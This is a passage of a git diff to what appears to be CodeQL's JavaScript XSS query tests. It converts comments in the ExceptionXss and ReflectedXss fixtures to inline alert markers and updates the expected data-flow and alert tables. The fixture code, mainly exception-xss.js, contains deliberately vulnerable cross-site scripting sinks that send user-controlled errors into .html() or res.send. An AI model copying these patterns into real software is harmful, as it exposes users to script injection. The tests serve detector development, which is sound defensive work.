e | exception-xss.js:107:18:107:18 | e | provenance | | -| exception-xss.js:117:11:117:23 | req.params.id | exception-xss.js:118:11:118:11 | e | provenance | Config | -| exception-xss.js:118:11:118:11 | e | exception-xss.js:119:28:119:28 | e | provenance | | -| exception-xss.js:119:28:119:28 | e | exception-xss.js:119:12:119:28 | "Exception: " + e | provenance | | -| exception-xss.js:125:45:125:68 | documen ... .search | exception-xss.js:128:11:128:52 | session ... ssion') | provenance | | -| exception-xss.js:128:11:128:52 | session ... ssion') | exception-xss.js:129:11:129:11 | e | provenance | Config | -| exception-xss.js:129:11:129:11 | e | exception-xss.js:130:18:130:18 | e | provenance | | -| exception-xss.js:136:10:136:22 | req.params.id | exception-xss.js:136:26:136:30 | error | provenance | Config | -| exception-xss.js:136:26:136:30 | error | exception-xss.js:138:19:138:23 | error | provenance | | -| exception-xss.js:146:6:146:35 | foo | exception-xss.js:148:33:148:35 | foo | provenance | | -| exception-xss.js:146:6:146:35 | foo | exception-xss.js:153:8:153:10 | foo | provenance | | -| exception-xss.js:146:6:146:35 | foo | exception-xss.js:174:31:174:33 | foo | provenance | | -| exception-xss.js:146:12:146:35 | documen ... .search | exception-xss.js:146:6:146:35 | foo | provenance | | -| exception-xss.js:148:2:148:46 | new Pro ... solve)) [PromiseError] | exception-xss.js:148:55:148:55 | e | provenance | | -| exception-xss.js:148:33:148:35 | foo | exception-xss.js:148:2:148:46 | new Pro ... solve)) [PromiseError] | provenance | Config | -| exception-xss.js:148:55:148:55 | e | exception-xss.js:149:18:149:18 | e | provenance | | -| exception-xss.js:153:8:153:10 | foo | exception-xss.js:154:11:154:11 | e | provenance | Config | -| exception-xss.js:154:11:154:11 | e | exception-xss.js:155:18:155:18 | e | provenance | | -| exception-xss.js:170:17:170:23 | tainted | exception-xss.js:171:11:171:17 | tainted | provenance | | -| exception-xss.js:174:2:174:44 | new Pro ... solve)) [PromiseError] | exception-xss.js:174:53:174:53 | e | provenance | | -| exception-xss.js:174:25:174:43 | exceptional return of inner(foo, resolve) | exception-xss.js:174:2:174:44 | new Pro ... solve)) [PromiseError] | provenance | | -| exception-xss.js:174:31:174:33 | foo | exception-xss.js:170:17:170:23 | tainted | provenance | | -| exception-xss.js:174:31:174:33 | foo | exception-xss.js:174:25:174:43 | exceptional return of inner(foo, resolve) | provenance | Config | -| exception-xss.js:174:53:174:53 | e | exception-xss.js:175:18:175:18 | e | provenance | | -| exception-xss.js:180:10:180:22 | req.params.id | exception-xss.js:180:26:180:30 | error | provenance | Config | -| exception-xss.js:180:26:180:30 | error | exception-xss.js:182:19:182:23 | error | provenance | | subpaths | exception-xss.js:15:9:15:11 | foo | exception-xss.js:4:17:4:17 | x | exception-xss.js:5:11:5:11 | x | exception-xss.js:15:3:15:12 | exceptional return of inner(foo) | | exception-xss.js:39:9:39:9 | x | exception-xss.js:41:17:41:17 | x | exception-xss.js:42:3:42:10 | exceptional return of inner(x) | exception-xss.js:39:3:39:10 | exceptional return of deep2(x) | @@ -162,22 +181,3 @@ subpaths | exception-xss.js:75:10:75:10 | x | exception-xss.js:4:17:4:17 | x | exception-xss.js:5:11:5:11 | x | exception-xss.js:75:4:75:11 | exceptional return of inner(x) | | exception-xss.js:81:16:81:18 | foo | exception-xss.js:74:28:74:28 | x | exception-xss.js:75:4:75:11 | exceptional return of inner(x) | exception-xss.js:81:3:81:19 | exceptional return of myWeirdInner(foo) | | exception-xss.js:174:31:174:33 | foo | exception-xss.js:170:17:170:23 | tainted | exception-xss.js:171:11:171:17 | tainted | exception-xss.js:174:25:174:43 | exceptional return of inner(foo, resolve) | -#select -| ajv.js:11:18:11:33 | ajv.errorsText() | ajv.js:11:18:11:33 | ajv.errorsText() | ajv.js:11:18:11:33 | ajv.errorsText() | $@ is reinterpreted as HTML without escaping meta-characters. | ajv.js:11:18:11:33 | ajv.errorsText() | JSON schema validation error | -| ajv.js:24:18:24:26 | val.error | ajv.js:24:18:24:26 | val.error | ajv.js:24:18:24:26 | val.error | $@ is reinterpreted as HTML without escaping meta-characters. | ajv.js:24:18:24:26 | val.error | JSON schema validation error | -| exception-xss.js:11:18:11:18 | e | exception-xss.js:2:12:2:28 | document.location | exception-xss.js:11:18:11:18 | e | $@ is reinterpreted as HTML without escaping meta-characters. | exception-xss.js:2:12:2:28 | document.location | Exception text | -| exception-xss.js:17:18:17:18 | e | exception-xss.js:2:12:2:28 | document.location | exception-xss.js:17:18:17:18 | e | $@ is reinterpreted as HTML without escaping meta-characters. | exception-xss.js:2:12:2:28 | document.location | Exception text | -| exception-xss.js:23:18:23:18 | e | exception-xss.js:2:12:2:28 | document.location | exception-xss.js:23:18:23:18 | e | $@ is reinterpreted as HTML without escaping meta-characters. | exception-xss.js:2:12:2:28 | document.location | Exception text | -| exception-xss.js:35:18:35:18 | e | exception-xss.js:2:12:2:28 | document.location | exception-xss.js:35:18:35:18 | e | $@ is reinterpreted as HTML without escaping meta-characters. | exception-xss.js:2:12:2:28 | document.location | Exception text | -| exception-xss.js:48:18:48:18 | e | exception-xss.js:2:12:2:28 | document.location | exception-xss.js:48:18:48:18 | e | $@ is reinterpreted as HTML without escaping meta-characters. | exception-xss.js:2:12:2:28 | document.location | Exception text | -| exception-xss.js:83:18:83:18 | e | exception-xss.js:2:12:2:28 | document.location | exception-xss.js:83:18:83:18 | e | $@ is reinterpreted as HTML without escaping meta-characters. | exception-xss.js:2:12:2:28 | document.location | Exception text | -| exception-xss.js:91:18:91:18 | e | exception-xss.js:2:12:2:28 | document.location | exception-xss.js:91:18:91:18 | e | $@ is reinterpreted as HTML without escaping meta-characters. | exception-xss.js:2:12:2:28 | document.location | Exception text | -| exception-xss.js:97:18:97:18 | e | exception-xss.js:2:12:2:28 | document.location | exception-xss.js:97:18:97:18 | e | $@ is reinterpreted as HTML without escaping meta-characters. | exception-xss.js:2:12:2:28 | document.location | Exception text | -| exception-xss.js:107:18:107:18 | e | exception-xss.js:2:12:2:28 | document.location | exception-xss.js:107:18:107:18 | e | $@ is reinterpreted as HTML without escaping meta-characters. | exception-xss.js:2:12:2:28 | document.location | Exception text | -| exception-xss.js:119:12:119:28 | "Exception: " + e | exception-xss.js:117:11:117:23 | req.params.id | exception-xss.js:119:12:119:28 | "Exception: " + e | $@ is reinterpreted as HTML without escaping meta-characters. | exception-xss.js:117:11:117:23 | req.params.id | Exception text | -| exception-xss.js:130:18:130:18 | e | exception-xss.js:125:45:125:68 | documen ... .search | exception-xss.js:130:18:130:18 | e | $@ is reinterpreted as HTML without escaping meta-characters. | exception-xss.js:125:45:125:68 | documen ... .search | Exception text | -| exception-xss.js:138:19:138:23 | error | exception-xss.js:136:10:136:22 | req.params.id | exception-xss.js:138:19:138:23 | error | $@ is reinterpreted as HTML without escaping meta-characters. | exception-xss.js:136:10:136:22 | req.params.id | Exception text | -| exception-xss.js:149:18:149:18 | e | exception-xss.js:146:12:146:35 | documen ... .search | exception-xss.js:149:18:149:18 | e | $@ is reinterpreted as HTML without escaping meta-characters. | exception-xss.js:146:12:146:35 | documen ... .search | Exception text | -| exception-xss.js:155:18:155:18 | e | exception-xss.js:146:12:146:35 | documen ... .search | exception-xss.js:155:18:155:18 | e | $@ is reinterpreted as HTML without escaping meta-characters. | exception-xss.js:146:12:146:35 | documen ... .search | Exception text | -| exception-xss.js:175:18:175:18 | e | exception-xss.js:146:12:146:35 | documen ... .search | exception-xss.js:175:18:175:18 | e | $@ is reinterpreted as HTML without escaping meta-characters. | exception-xss.js:146:12:146:35 | documen ... .search | Exception text | -| exception-xss.js:182:19:182:23 | error | exception-xss.js:180:10:180:22 | req.params.id | exception-xss.js:182:19:182:23 | error | $@ is reinterpreted as HTML without escaping meta-characters. | exception-xss.js:180:10:180:22 | req.params.id | Exception text | diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ExceptionXss.qlref b/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ExceptionXss.qlref index 5fae24d64c44..fc217c51197f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ExceptionXss.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ExceptionXss.qlref @@ -1 +1,2 @@ -Security/CWE-079/ExceptionXss.ql \ No newline at end of file +query: Security/CWE-079/ExceptionXss.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ajv.js b/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ajv.js index 36dd5181a1b5..43c6618430e2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ajv.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ajv.js @@ -8,7 +8,7 @@ ajv.addSchema({type: 'object', additionalProperties: {type: 'number'}}, 'pollDat app.post('/polldata', (req, res) => { if (!ajv.validate('pollData', req.body)) { - res.send(ajv.errorsText()); // NOT OK + res.send(ajv.errorsText()); // $ Alert } }); @@ -21,6 +21,6 @@ const joiSchema = joi.object().keys({ app.post('/votedata', (req, res) => { const val = joiSchema.validate(req.body); if (val.error) { - res.send(val.error); // NOT OK + res.send(val.error); // $ Alert } }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/exception-xss.js b/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/exception-xss.js index 150b9e204fda..68212b5c0dd4 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/exception-xss.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/exception-xss.js @@ -1,5 +1,5 @@ (function () { - var foo = document.location; + var foo = document.location; // $ Source function inner(x) { unknown(x); @@ -8,31 +8,31 @@ try { unknown(foo); } catch (e) { - $('myId').html(e); // NOT OK! + $('myId').html(e); // $ Alert } try { inner(foo); } catch (e) { - $('myId').html(e); // NOT OK! + $('myId').html(e); // $ Alert } try { unknown(foo + "bar"); } catch (e) { - $('myId').html(e); // NOT OK! + $('myId').html(e); // $ Alert } try { unknown({ prop: foo }); } catch (e) { - $('myId').html(e); // NOT OK! - but not detected due to not tainting object that have a tainted propety. [INCONSISTENCY] + $('myId').html(e); // $ MISSING: Alert - but not detected due to not tainting object that have a tainted propety. } try { unknown(["bar", foo]); } catch (e) { - $('myId').html(e); // NOT OK! + $('myId').html(e); // $ Alert } function deep(x) { @@ -45,13 +45,13 @@ try { deep("bar" + foo); } catch (e) { - $('myId').html(e); // NOT OK! + $('myId').html(e); // $ Alert } try { var tmp = "bar" + foo; } catch (e) { - $('myId').html(e); // OK + $('myId').html(e); } function safe(x) { @@ -61,13 +61,13 @@ try { safe(foo); } catch (e) { - $('myId').html(e); // OK + $('myId').html(e); } try { safe.call(null, foo); } catch (e) { - $('myId').html(e); // OK + $('myId').html(e); } var myWeirdInner; try { @@ -75,12 +75,12 @@ inner(x); } } catch (e) { - $('myId').html(e); // OK + $('myId').html(e); } try { myWeirdInner(foo); } catch (e) { - $('myId').html(e); // NOT OK! + $('myId').html(e); // $ Alert } $('myId').html(foo); // Direct leak, reported by other query. @@ -88,13 +88,13 @@ try { unknown(foo.match(/foo/)); } catch (e) { - $('myId').html(e); // NOT OK! + $('myId').html(e); // $ Alert } try { unknown([foo, "bar"]); } catch (e) { - $('myId').html(e); // NOT OK! + $('myId').html(e); // $ Alert } try { @@ -104,7 +104,7 @@ // nothing } } catch (e) { - $('myId').html(e); // NOT OK! + $('myId').html(e); // $ Alert } }); @@ -114,57 +114,57 @@ var app = express(); app.get('/user/:id', function (req, res) { try { - unknown(req.params.id); + unknown(req.params.id); // $ Source } catch (e) { - res.send("Exception: " + e); // NOT OK! + res.send("Exception: " + e); // $ Alert } }); (function () { - sessionStorage.setItem('exceptionSession', document.location.search); + sessionStorage.setItem('exceptionSession', document.location.search); // $ Source try { unknown(sessionStorage.getItem('exceptionSession')); } catch (e) { - $('myId').html(e); // NOT OK + $('myId').html(e); // $ Alert } })(); app.get('/user/:id', function (req, res) { - unknown(req.params.id, (error, res) => { + unknown(req.params.id, (error, res) => { // $ Source if (error) { - $('myId').html(error); // NOT OK + $('myId').html(error); // $ Alert return; } - $('myId').html(res); // OK (for now?) + $('myId').html(res); // OK - for now? }); }); (function () { - var foo = document.location.search; + var foo = document.location.search; // $ Source new Promise(resolve => unknown(foo, resolve)).catch((e) => { - $('myId').html(e); // NOT OK + $('myId').html(e); // $ Alert }); try { null[foo]; } catch (e) { - $('myId').html(e); // NOT OK + $('myId').html(e); // $ Alert } try { unknown()[foo]; } catch (e) { - $('myId').html(e); // OK. We are not sure that `unknown()` is null-ish. + $('myId').html(e); // OK - We are not sure that `unknown()` is null-ish. } try { "foo"[foo] } catch (e) { - $('myId').html(e); // OK + $('myId').html(e); } function inner(tainted, resolve) { @@ -172,16 +172,16 @@ app.get('/user/:id', function (req, res) { } new Promise(resolve => inner(foo, resolve)).catch((e) => { - $('myId').html(e); // NOT OK + $('myId').html(e); // $ Alert }); })(); app.get('/user/:id', function (req, res) { - unknown(req.params.id, (error, res) => { + unknown(req.params.id, (error, res) => { // $ Source if (error) { - $('myId').html(error); // NOT OK + $('myId').html(error); // $ Alert } - $('myId').html(res); // OK - does not contain an error, and `res` is otherwise unknown. + $('myId').html(res); // OK - does not contain an error, and `res` is otherwise unknown. }); }); @@ -189,7 +189,7 @@ app.get('/user/:id', function (req, res) { try { res.send(req.params.id); } catch(err) { - res.send(err); // OK (the above `res.send()` is already reported by js/xss) + res.send(err); // OK - (the above `res.send()` is already reported by js/xss) } }); @@ -210,7 +210,7 @@ var fs = require("fs"); log.info(foo); localStorage.setItem(foo); } catch (e) { - $('myId').html(e); // OK + $('myId').html(e); } })(); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ConsistencyReflectedXss.expected b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ConsistencyReflectedXss.expected deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ConsistencyReflectedXss.ql b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ConsistencyReflectedXss.ql deleted file mode 100644 index 9019d53e10ed..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ConsistencyReflectedXss.ql +++ /dev/null @@ -1,3 +0,0 @@ -import javascript -deprecated import utils.test.ConsistencyChecking -import semmle.javascript.security.dataflow.ReflectedXssQuery as ReflectedXss diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.expected b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.expected index 675403f5ab9d..d85a90e4026a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.expected +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.expected @@ -1,44 +1,101 @@ +#select +| ReflectedXss.js:7:14:7:45 | "Unknow ... rams.id | ReflectedXss.js:7:33:7:45 | req.params.id | ReflectedXss.js:7:14:7:45 | "Unknow ... rams.id | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:7:33:7:45 | req.params.id | user-provided value | +| ReflectedXss.js:16:12:16:39 | "Unknow ... rams.id | ReflectedXss.js:16:31:16:39 | params.id | ReflectedXss.js:16:12:16:39 | "Unknow ... rams.id | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:16:31:16:39 | params.id | user-provided value | +| ReflectedXss.js:21:12:21:19 | req.body | ReflectedXss.js:21:12:21:19 | req.body | ReflectedXss.js:21:12:21:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:21:12:21:19 | req.body | user-provided value | +| ReflectedXss.js:22:12:22:27 | marked(req.body) | ReflectedXss.js:22:19:22:26 | req.body | ReflectedXss.js:22:12:22:27 | marked(req.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:22:19:22:26 | req.body | user-provided value | +| ReflectedXss.js:28:12:28:19 | req.body | ReflectedXss.js:28:12:28:19 | req.body | ReflectedXss.js:28:12:28:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:28:12:28:19 | req.body | user-provided value | +| ReflectedXss.js:33:12:33:18 | mytable | ReflectedXss.js:31:14:31:21 | req.body | ReflectedXss.js:33:12:33:18 | mytable | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:31:14:31:21 | req.body | user-provided value | +| ReflectedXss.js:40:12:40:19 | req.body | ReflectedXss.js:40:12:40:19 | req.body | ReflectedXss.js:40:12:40:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:40:12:40:19 | req.body | user-provided value | +| ReflectedXss.js:41:12:41:39 | convert ... q.body) | ReflectedXss.js:41:31:41:38 | req.body | ReflectedXss.js:41:12:41:39 | convert ... q.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:41:31:41:38 | req.body | user-provided value | +| ReflectedXss.js:55:12:55:19 | req.body | ReflectedXss.js:55:12:55:19 | req.body | ReflectedXss.js:55:12:55:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:55:12:55:19 | req.body | user-provided value | +| ReflectedXss.js:64:16:64:19 | file | ReflectedXss.js:63:14:63:21 | req.body | ReflectedXss.js:64:16:64:19 | file | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:63:14:63:21 | req.body | user-provided value | +| ReflectedXss.js:67:12:67:52 | remark( ... tring() | ReflectedXss.js:67:33:67:40 | req.body | ReflectedXss.js:67:12:67:52 | remark( ... tring() | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:67:33:67:40 | req.body | user-provided value | +| ReflectedXss.js:71:12:71:65 | unified ... oString | ReflectedXss.js:71:48:71:55 | req.body | ReflectedXss.js:71:12:71:65 | unified ... oString | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:71:48:71:55 | req.body | user-provided value | +| ReflectedXss.js:74:14:74:14 | f | ReflectedXss.js:73:20:73:27 | req.body | ReflectedXss.js:74:14:74:14 | f | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:73:20:73:27 | req.body | user-provided value | +| ReflectedXss.js:82:12:82:19 | req.body | ReflectedXss.js:82:12:82:19 | req.body | ReflectedXss.js:82:12:82:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:82:12:82:19 | req.body | user-provided value | +| ReflectedXss.js:83:12:83:30 | snarkdown(req.body) | ReflectedXss.js:83:22:83:29 | req.body | ReflectedXss.js:83:12:83:30 | snarkdown(req.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:83:22:83:29 | req.body | user-provided value | +| ReflectedXss.js:84:12:84:31 | snarkdown2(req.body) | ReflectedXss.js:84:23:84:30 | req.body | ReflectedXss.js:84:12:84:31 | snarkdown2(req.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:84:23:84:30 | req.body | user-provided value | +| ReflectedXss.js:96:12:96:19 | req.body | ReflectedXss.js:96:12:96:19 | req.body | ReflectedXss.js:96:12:96:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:96:12:96:19 | req.body | user-provided value | +| ReflectedXss.js:97:12:97:38 | markdow ... q.body) | ReflectedXss.js:97:30:97:37 | req.body | ReflectedXss.js:97:12:97:38 | markdow ... q.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:97:30:97:37 | req.body | user-provided value | +| ReflectedXss.js:99:12:99:39 | markdow ... q.body) | ReflectedXss.js:99:31:99:38 | req.body | ReflectedXss.js:99:12:99:39 | markdow ... q.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:99:31:99:38 | req.body | user-provided value | +| ReflectedXss.js:102:12:102:84 | markdow ... q.body) | ReflectedXss.js:102:76:102:83 | req.body | ReflectedXss.js:102:12:102:84 | markdow ... q.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:102:76:102:83 | req.body | user-provided value | +| ReflectedXss.js:109:16:109:30 | request.query.p | ReflectedXss.js:109:16:109:30 | request.query.p | ReflectedXss.js:109:16:109:30 | request.query.p | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:109:16:109:30 | request.query.p | user-provided value | +| ReflectedXss.js:121:30:121:73 | `${inva ... telist` | ReflectedXss.js:113:13:113:27 | keys: queryKeys | ReflectedXss.js:121:30:121:73 | `${inva ... telist` | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:113:13:113:27 | keys: queryKeys | user-provided value | +| ReflectedXss.js:121:30:121:73 | `${inva ... telist` | ReflectedXss.js:115:31:115:45 | paramKeys?.keys | ReflectedXss.js:121:30:121:73 | `${inva ... telist` | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:115:31:115:45 | paramKeys?.keys | user-provided value | +| ReflectedXssContentTypes.js:10:14:10:36 | "FOO: " ... rams.id | ReflectedXssContentTypes.js:10:24:10:36 | req.params.id | ReflectedXssContentTypes.js:10:14:10:36 | "FOO: " ... rams.id | Cross-site scripting vulnerability due to a $@. | ReflectedXssContentTypes.js:10:24:10:36 | req.params.id | user-provided value | +| ReflectedXssContentTypes.js:20:14:20:36 | "FOO: " ... rams.id | ReflectedXssContentTypes.js:20:24:20:36 | req.params.id | ReflectedXssContentTypes.js:20:14:20:36 | "FOO: " ... rams.id | Cross-site scripting vulnerability due to a $@. | ReflectedXssContentTypes.js:20:24:20:36 | req.params.id | user-provided value | +| ReflectedXssContentTypes.js:39:13:39:35 | "FOO: " ... rams.id | ReflectedXssContentTypes.js:39:23:39:35 | req.params.id | ReflectedXssContentTypes.js:39:13:39:35 | "FOO: " ... rams.id | Cross-site scripting vulnerability due to a $@. | ReflectedXssContentTypes.js:39:23:39:35 | req.params.id | user-provided value | +| ReflectedXssContentTypes.js:70:12:70:34 | "FOO: " ... rams.id | ReflectedXssContentTypes.js:70:22:70:34 | req.params.id | ReflectedXssContentTypes.js:70:12:70:34 | "FOO: " ... rams.id | Cross-site scripting vulnerability due to a $@. | ReflectedXssContentTypes.js:70:22:70:34 | req.params.id | user-provided value | +| ReflectedXssGood3.js:139:12:139:27 | escapeHtml3(url) | ReflectedXssGood3.js:135:15:135:27 | req.params.id | ReflectedXssGood3.js:139:12:139:27 | escapeHtml3(url) | Cross-site scripting vulnerability due to a $@. | ReflectedXssGood3.js:135:15:135:27 | req.params.id | user-provided value | +| etherpad.js:11:12:11:19 | response | etherpad.js:9:16:9:30 | req.query.jsonp | etherpad.js:11:12:11:19 | response | Cross-site scripting vulnerability due to a $@. | etherpad.js:9:16:9:30 | req.query.jsonp | user-provided value | +| formatting.js:6:14:6:47 | util.fo ... , evil) | formatting.js:4:16:4:29 | req.query.evil | formatting.js:6:14:6:47 | util.fo ... , evil) | Cross-site scripting vulnerability due to a $@. | formatting.js:4:16:4:29 | req.query.evil | user-provided value | +| formatting.js:7:14:7:53 | require ... , evil) | formatting.js:4:16:4:29 | req.query.evil | formatting.js:7:14:7:53 | require ... , evil) | Cross-site scripting vulnerability due to a $@. | formatting.js:4:16:4:29 | req.query.evil | user-provided value | +| live-server.js:6:13:6:50 | ` ... /html>` | live-server.js:4:21:4:27 | req.url | live-server.js:6:13:6:50 | ` ... /html>` | Cross-site scripting vulnerability due to a $@. | live-server.js:4:21:4:27 | req.url | user-provided value | +| live-server.js:12:13:12:50 | ` ... /html>` | live-server.js:10:21:10:27 | req.url | live-server.js:12:13:12:50 | ` ... /html>` | Cross-site scripting vulnerability due to a $@. | live-server.js:10:21:10:27 | req.url | user-provided value | +| pages/Next.jsx:8:13:8:19 | req.url | pages/Next.jsx:8:13:8:19 | req.url | pages/Next.jsx:8:13:8:19 | req.url | Cross-site scripting vulnerability due to a $@. | pages/Next.jsx:8:13:8:19 | req.url | user-provided value | +| pages/Next.jsx:15:13:15:19 | req.url | pages/Next.jsx:15:13:15:19 | req.url | pages/Next.jsx:15:13:15:19 | req.url | Cross-site scripting vulnerability due to a $@. | pages/Next.jsx:15:13:15:19 | req.url | user-provided value | +| pages/api/myapi.js:2:14:2:20 | req.url | pages/api/myapi.js:2:14:2:20 | req.url | pages/api/myapi.js:2:14:2:20 | req.url | Cross-site scripting vulnerability due to a $@. | pages/api/myapi.js:2:14:2:20 | req.url | user-provided value | +| partial.js:10:14:10:18 | x + y | partial.js:13:42:13:48 | req.url | partial.js:10:14:10:18 | x + y | Cross-site scripting vulnerability due to a $@. | partial.js:13:42:13:48 | req.url | user-provided value | +| partial.js:19:14:19:18 | x + y | partial.js:22:51:22:57 | req.url | partial.js:19:14:19:18 | x + y | Cross-site scripting vulnerability due to a $@. | partial.js:22:51:22:57 | req.url | user-provided value | +| partial.js:28:14:28:18 | x + y | partial.js:31:47:31:53 | req.url | partial.js:28:14:28:18 | x + y | Cross-site scripting vulnerability due to a $@. | partial.js:31:47:31:53 | req.url | user-provided value | +| partial.js:37:14:37:18 | x + y | partial.js:40:43:40:49 | req.url | partial.js:37:14:37:18 | x + y | Cross-site scripting vulnerability due to a $@. | partial.js:40:43:40:49 | req.url | user-provided value | +| promises.js:6:25:6:25 | x | promises.js:5:44:5:57 | req.query.data | promises.js:6:25:6:25 | x | Cross-site scripting vulnerability due to a $@. | promises.js:5:44:5:57 | req.query.data | user-provided value | +| tst2.js:7:12:7:12 | p | tst2.js:6:9:6:9 | p | tst2.js:7:12:7:12 | p | Cross-site scripting vulnerability due to a $@. | tst2.js:6:9:6:9 | p | user-provided value | +| tst2.js:8:12:8:12 | r | tst2.js:6:12:6:15 | q: r | tst2.js:8:12:8:12 | r | Cross-site scripting vulnerability due to a $@. | tst2.js:6:12:6:15 | q: r | user-provided value | +| tst2.js:18:12:18:12 | p | tst2.js:14:9:14:9 | p | tst2.js:18:12:18:12 | p | Cross-site scripting vulnerability due to a $@. | tst2.js:14:9:14:9 | p | user-provided value | +| tst2.js:21:14:21:14 | p | tst2.js:14:9:14:9 | p | tst2.js:21:14:21:14 | p | Cross-site scripting vulnerability due to a $@. | tst2.js:14:9:14:9 | p | user-provided value | +| tst2.js:36:12:36:12 | p | tst2.js:30:9:30:9 | p | tst2.js:36:12:36:12 | p | Cross-site scripting vulnerability due to a $@. | tst2.js:30:9:30:9 | p | user-provided value | +| tst2.js:37:12:37:18 | other.p | tst2.js:30:9:30:9 | p | tst2.js:37:12:37:18 | other.p | Cross-site scripting vulnerability due to a $@. | tst2.js:30:9:30:9 | p | user-provided value | +| tst2.js:51:12:51:17 | unsafe | tst2.js:43:9:43:9 | p | tst2.js:51:12:51:17 | unsafe | Cross-site scripting vulnerability due to a $@. | tst2.js:43:9:43:9 | p | user-provided value | +| tst2.js:63:12:63:12 | p | tst2.js:57:9:57:9 | p | tst2.js:63:12:63:12 | p | Cross-site scripting vulnerability due to a $@. | tst2.js:57:9:57:9 | p | user-provided value | +| tst2.js:64:12:64:18 | other.p | tst2.js:57:9:57:9 | p | tst2.js:64:12:64:18 | other.p | Cross-site scripting vulnerability due to a $@. | tst2.js:57:9:57:9 | p | user-provided value | +| tst2.js:75:12:75:12 | p | tst2.js:69:9:69:9 | p | tst2.js:75:12:75:12 | p | Cross-site scripting vulnerability due to a $@. | tst2.js:69:9:69:9 | p | user-provided value | +| tst2.js:76:12:76:18 | other.p | tst2.js:69:9:69:9 | p | tst2.js:76:12:76:18 | other.p | Cross-site scripting vulnerability due to a $@. | tst2.js:69:9:69:9 | p | user-provided value | +| tst2.js:88:12:88:12 | p | tst2.js:82:9:82:9 | p | tst2.js:88:12:88:12 | p | Cross-site scripting vulnerability due to a $@. | tst2.js:82:9:82:9 | p | user-provided value | +| tst2.js:89:12:89:18 | other.p | tst2.js:82:9:82:9 | p | tst2.js:89:12:89:18 | other.p | Cross-site scripting vulnerability due to a $@. | tst2.js:82:9:82:9 | p | user-provided value | +| tst3.js:6:12:6:12 | p | tst3.js:5:9:5:9 | p | tst3.js:6:12:6:12 | p | Cross-site scripting vulnerability due to a $@. | tst3.js:5:9:5:9 | p | user-provided value | +| tst3.js:12:12:12:15 | code | tst3.js:11:32:11:39 | reg.body | tst3.js:12:12:12:15 | code | Cross-site scripting vulnerability due to a $@. | tst3.js:11:32:11:39 | reg.body | user-provided value | edges -| ReflectedXss.js:8:33:8:45 | req.params.id | ReflectedXss.js:8:14:8:45 | "Unknow ... rams.id | provenance | | -| ReflectedXss.js:17:31:17:39 | params.id | ReflectedXss.js:17:12:17:39 | "Unknow ... rams.id | provenance | | -| ReflectedXss.js:23:19:23:26 | req.body | ReflectedXss.js:23:12:23:27 | marked(req.body) | provenance | | -| ReflectedXss.js:30:7:33:4 | mytable | ReflectedXss.js:34:12:34:18 | mytable | provenance | | -| ReflectedXss.js:30:17:33:4 | table([ ... y]\\n ]) | ReflectedXss.js:30:7:33:4 | mytable | provenance | | -| ReflectedXss.js:32:14:32:21 | req.body | ReflectedXss.js:30:17:33:4 | table([ ... y]\\n ]) | provenance | | -| ReflectedXss.js:42:31:42:38 | req.body | ReflectedXss.js:42:12:42:39 | convert ... q.body) | provenance | | -| ReflectedXss.js:64:14:64:21 | req.body | ReflectedXss.js:64:39:64:42 | file | provenance | | -| ReflectedXss.js:64:39:64:42 | file | ReflectedXss.js:65:16:65:19 | file | provenance | | -| ReflectedXss.js:68:12:68:41 | remark( ... q.body) | ReflectedXss.js:68:12:68:52 | remark( ... tring() | provenance | | -| ReflectedXss.js:68:33:68:40 | req.body | ReflectedXss.js:68:12:68:41 | remark( ... q.body) | provenance | | -| ReflectedXss.js:72:12:72:56 | unified ... q.body) | ReflectedXss.js:72:12:72:65 | unified ... oString | provenance | | -| ReflectedXss.js:72:48:72:55 | req.body | ReflectedXss.js:72:12:72:56 | unified ... q.body) | provenance | | -| ReflectedXss.js:74:20:74:27 | req.body | ReflectedXss.js:74:34:74:34 | f | provenance | | 